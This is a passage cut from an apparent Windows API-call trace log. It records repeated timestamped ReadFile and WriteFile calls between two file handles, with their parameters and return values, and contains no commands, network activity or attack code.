lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.445] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x174, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.451] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.452] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.454] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.455] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.458] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.458] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.459] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.459] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.460] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.461] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.461] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.462] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.463] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.465] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.465] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.466] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.466] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.467] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.470] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.477] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.478] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.481] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.485] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.489] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.489] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.491] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.492] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 